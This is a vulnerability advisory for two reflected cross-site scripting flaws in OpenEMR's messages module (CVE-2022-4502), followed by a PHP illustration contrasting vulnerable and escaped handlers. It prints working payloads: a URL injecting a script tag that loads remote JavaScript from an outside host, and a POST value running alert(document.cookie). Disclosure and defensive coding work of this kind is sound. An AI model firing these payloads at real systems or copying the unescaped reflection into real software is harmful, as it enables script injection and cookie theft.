OpenEMR – Multiple Reflected Cross-Site Scripting in Messages Module (CVE-2022-4502)
Summary
The messages module was affected by two instances of reflected Cross-Site Scripting (XSS). The first one involved the “stage” parameter of the “setup” functionality.
The second instance affected the parameter named “parameter”, sent in the POST data while a message is being saved. The payload was reflected in a response served with an HTML content type.
Impact
Description
The first instance affects the messages.php file using the following parameter:
http://openemr.vuln/interface/main/messages/messages.php?go=setup&stage=%3Cscript%20src=//xt.rs%3E%3C/script%3E
The web page generated the following unescaped markup, which led to remote JavaScript being executed in the context of the user's browser:
<br />
<span class='title'>
<script src=//xt.rs></script> Warning: This is not a valid request.
</span>

The second instance affected the message save functionality using the “process” action, as shown below:
Host: xxxxxxx
(…snip…)
parameter={"xss":"<img%20src=x%20onerror=alert(document.cookie)>"}
(…snip…)
Content-Type: text/html; charset=utf-8
{"xss":"<img src=x onerror=alert(document.cookie)>"}
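The following PHP is an added illustration, not OpenEMR's code and not the vendor's patch: it reconstructs the two reflection patterns the advisory describes as hypothetical handlers, each beside a hardened form, and runs them on the markup shown above.

```php
<?php
// Added illustration, not OpenEMR's code: hypothetical handlers that mirror the
// two reflection points described in the advisory, each beside a hardened form.

// Case 1: the "stage" query parameter echoed into a warning span.
function stageWarningVulnerable(string $stage): string {
    // Unescaped reflection: any markup in $stage becomes part of the page.
    return "<span class='title'>" . $stage . " Warning: This is not a valid request.</span>";
}

function stageWarningFixed(string $stage): string {
    // Output encoding for the HTML body context: < > & " ' become entities,
    // so the browser shows the text instead of parsing it as a tag.
    $safe = htmlspecialchars($stage, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<span class='title'>" . $safe . " Warning: This is not a valid request.</span>";
}

// Case 2: the POSTed "parameter" JSON echoed back to the client.
function echoParameterVulnerable(string $parameter): array {
    // Body returned verbatim under text/html: the browser renders any markup in it.
    return ['Content-Type' => 'text/html; charset=utf-8', 'body' => $parameter];
}

function echoParameterFixed(string $parameter): array {
    // Reject anything that is not JSON, re-encode with HTML-significant characters
    // escaped, and serve it as JSON with nosniff so it is never treated as a document.
    $decoded = json_decode($parameter, true);
    if (json_last_error() !== JSON_ERROR_NONE) {
        return ['Content-Type' => 'application/json; charset=utf-8',
                'X-Content-Type-Options' => 'nosniff',
                'body' => '{"error":"invalid JSON"}'];
    }
    $body = json_encode($decoded, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
    return ['Content-Type' => 'application/json; charset=utf-8',
            'X-Content-Type-Options' => 'nosniff',
            'body' => $body];
}

// Demonstration on the inputs quoted in the advisory (constructed sample values).
$stage = '<script src=//xt.rs></script>';
echo stageWarningVulnerable($stage), "\n";   // tag reaches the page intact
echo stageWarningFixed($stage), "\n";        // &lt;script src=//xt.rs&gt;... shown as text

$parameter = '{"xss":"<img src=x onerror=alert(document.cookie)>"}';
print_r(echoParameterVulnerable($parameter)); // text/html with raw markup
print_r(echoParameterFixed($parameter));      // application/json, <, > emitted as \u003C \u003E
```

The JSON_HEX_* flags are a defence in depth on top of the content type change: even if the response were rendered as HTML, the escaped sequences carry no tag.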
